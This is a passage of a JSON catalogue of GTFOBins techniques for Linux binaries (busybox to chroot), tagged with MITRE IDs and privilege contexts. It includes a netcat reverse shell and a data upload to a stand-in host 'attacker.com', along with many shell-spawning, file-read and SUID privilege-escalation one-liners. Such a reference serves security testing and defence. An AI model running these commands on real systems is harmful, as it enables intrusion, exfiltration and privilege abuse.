installation","aliases":[]},{"id":"gtfo:busybox:reverse-shell:0:sudo","toolId":"gtfo:busybox","toolName":"busybox","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"busybox nc -e /bin/sh attacker.com 12345","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busybox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busybox:reverse-shell:0:unprivileged","toolId":"gtfo:busybox","toolName":"busybox","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"busybox nc -e /bin/sh attacker.com 12345","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busybox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busybox:upload:0:sudo","toolId":"gtfo:busybox","toolName":"busybox","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"busybox httpd -f -p 12345 -h .","description":"This serves files in the local folder via an HTTP server.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busybox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busybox:upload:0:unprivileged","toolId":"gtfo:busybox","toolName":"busybox","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"busybox httpd -f -p 12345 -h .","description":"This serves files in the local folder via an HTTP server.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busybox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:byebug:inherit:0:sudo","toolId":"gtfo:byebug","toolName":"byebug","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"byebug --no-stop /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/byebug/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:byebug:inherit:0:unprivileged","toolId":"gtfo:byebug","toolName":"byebug","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"byebug --no-stop /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/byebug/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bzip2:file-read:0:sudo","toolId":"gtfo:bzip2","toolName":"bzip2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bzip2 -c /path/to/input-file | bzip2 -d","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bzip2/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bzip2:file-read:0:suid","toolId":"gtfo:bzip2","toolName":"bzip2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bzip2 -c /path/to/input-file | bzip2 -d","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bzip2/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bzip2:file-read:0:unprivileged","toolId":"gtfo:bzip2","toolName":"bzip2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bzip2 -c /path/to/input-file | bzip2 -d","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bzip2/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cabal:shell:0:sudo","toolId":"gtfo:cabal","toolName":"cabal","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cabal exec --project-file=/dev/null -- /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cabal/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cabal:shell:0:suid","toolId":"gtfo:cabal","toolName":"cabal","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cabal exec --project-file=/dev/null -- /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cabal/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cabal:shell:0:unprivileged","toolId":"gtfo:cabal","toolName":"cabal","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cabal exec --project-file=/dev/null -- /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cabal/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cancel:upload:0:sudo","toolId":"gtfo:cancel","toolName":"cancel","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"cancel -h attacker.com:12345 -u DATA","description":"Data is sent as a POST request along with other content.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cancel/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cancel:upload:0:suid","toolId":"gtfo:cancel","toolName":"cancel","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"cancel -h attacker.com:12345 -u DATA","description":"Data is sent as a POST request along with other content.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cancel/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cancel:upload:0:unprivileged","toolId":"gtfo:cancel","toolName":"cancel","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"cancel -h attacker.com:12345 -u DATA","description":"Data is sent as a POST request along with other content.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cancel/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:capsh:shell:0:sudo","toolId":"gtfo:capsh","toolName":"capsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"capsh --","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/capsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:capsh:shell:0:suid","toolId":"gtfo:capsh","toolName":"capsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"capsh --gid=0 --uid=0 --","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/capsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:capsh:shell:0:unprivileged","toolId":"gtfo:capsh","toolName":"capsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"capsh --","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/capsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cargo:inherit:0:sudo","toolId":"gtfo:cargo","toolName":"cargo","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"cargo help doc","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cargo/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cargo:inherit:0:unprivileged","toolId":"gtfo:cargo","toolName":"cargo","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"cargo help doc","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cargo/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cat:file-read:0:sudo","toolId":"gtfo:cat","toolName":"cat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cat /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cat:file-read:0:suid","toolId":"gtfo:cat","toolName":"cat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cat /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cat:file-read:0:unprivileged","toolId":"gtfo:cat","toolName":"cat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cat /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cdist:shell:0:sudo","toolId":"gtfo:cdist","toolName":"cdist","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cdist shell -s /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cdist/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cdist:shell:0:unprivileged","toolId":"gtfo:cdist","toolName":"cdist","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cdist shell -s /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cdist/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:certbot:shell:0:sudo","toolId":"gtfo:certbot","toolName":"certbot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"certbot certonly -n -d x --standalone --dry-run --agree-tos --email x --logs-dir . --work-dir . --config-dir . --pre-hook '/bin/sh 1>&0 2>&0'","description":"This needs a writable directory, replace `.` if needed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/certbot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:certbot:shell:0:unprivileged","toolId":"gtfo:certbot","toolName":"certbot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"certbot certonly -n -d x --standalone --dry-run --agree-tos --email x --logs-dir . --work-dir . --config-dir . --pre-hook '/bin/sh 1>&0 2>&0'","description":"This needs a writable directory, replace `.` if needed.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/certbot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:chattr:privilege-escalation:0:sudo","toolId":"gtfo:chattr","toolName":"chattr","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chattr +i /path/to/input-file","description":"Make the target file immutable.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chattr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:chattr:privilege-escalation:0:suid","toolId":"gtfo:chattr","toolName":"chattr","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chattr +i /path/to/input-file","description":"Make the target file immutable.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chattr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_by_ssh:shell:0:sudo","toolId":"gtfo:check_by_ssh","toolName":"check_by_ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"check_by_ssh -o \"ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)\" -H localhost -C x","description":"The shell will only last 10 seconds.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_by_ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_by_ssh:shell:0:unprivileged","toolId":"gtfo:check_by_ssh","toolName":"check_by_ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"check_by_ssh -o \"ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)\" -H localhost -C x","description":"The shell will only last 10 seconds.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_by_ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_cups:file-read:0:sudo","toolId":"gtfo:check_cups","toolName":"check_cups","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_cups --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_cups/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_cups:file-read:0:unprivileged","toolId":"gtfo:check_cups","toolName":"check_cups","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_cups --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_cups/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_log:file-read:0:sudo","toolId":"gtfo:check_log","toolName":"check_log","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_log -F /path/to/input-file -O /dev/stdout","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_log/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_log:file-read:0:unprivileged","toolId":"gtfo:check_log","toolName":"check_log","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_log -F /path/to/input-file -O /dev/stdout","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_log/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_log:file-write:0:sudo","toolId":"gtfo:check_log","toolName":"check_log","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"check_log -F /path/to/input-file -O /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_log/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_log:file-write:0:unprivileged","toolId":"gtfo:check_log","toolName":"check_log","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"check_log -F /path/to/input-file -O /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_log/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_memory:file-read:0:sudo","toolId":"gtfo:check_memory","toolName":"check_memory","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_memory --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_memory/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_memory:file-read:0:unprivileged","toolId":"gtfo:check_memory","toolName":"check_memory","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_memory --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_memory/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_raid:file-read:0:sudo","toolId":"gtfo:check_raid","toolName":"check_raid","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_raid --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_raid/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_raid:file-read:0:unprivileged","toolId":"gtfo:check_raid","toolName":"check_raid","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_raid --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_raid/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_ssl_cert:shell:0:sudo","toolId":"gtfo:check_ssl_cert","toolName":"check_ssl_cert","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file\nchmod +x /path/to/temp-file\ncheck_ssl_cert --grep-bin /path/to/temp-file -H x","description":"The shell will be invoked multiple times.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_ssl_cert/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_ssl_cert:shell:0:unprivileged","toolId":"gtfo:check_ssl_cert","toolName":"check_ssl_cert","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file\nchmod +x /path/to/temp-file\ncheck_ssl_cert --grep-bin /path/to/temp-file -H x","description":"The shell will be invoked multiple times.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_ssl_cert/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_statusfile:file-read:0:sudo","toolId":"gtfo:check_statusfile","toolName":"check_statusfile","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_statusfile /path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_statusfile/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_statusfile:file-read:0:unprivileged","toolId":"gtfo:check_statusfile","toolName":"check_statusfile","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_statusfile /path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_statusfile/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:chmod:privilege-escalation:0:sudo","toolId":"gtfo:chmod","toolName":"chmod","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chmod 6777 /path/to/input-file","description":"This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chmod/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:chmod:privilege-escalation:0:suid","toolId":"gtfo:chmod","toolName":"chmod","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chmod 6777 /path/to/input-file","description":"This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chmod/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:choom:shell:0:sudo","toolId":"gtfo:choom","toolName":"choom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"choom -n 0 /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/choom/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:choom:shell:0:suid","toolId":"gtfo:choom","toolName":"choom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"choom -n 0 -- /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/choom/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:choom:shell:0:unprivileged","toolId":"gtfo:choom","toolName":"choom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"choom -n 0 /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/choom/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:chown:privilege-escalation:0:sudo","toolId":"gtfo:chown","toolName":"chown","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chown $(id -un):$(id -gn) /path/to/input-file","description":"This can be run with elevated privileges to change ownership and then read, write, or execute a file.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chown/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:chown:privilege-escalation:0:suid","toolId":"gtfo:chown","toolName":"chown","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chown $(id -un):$(id -gn) /path/to/input-file","description":"This can be run with elevated privileges to change ownership and then read, write, or execute a file.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chown/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:chroot:shell:0:sudo","toolId":"gtfo:chroot","toolName":"chroot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"chroot /","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chroot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution 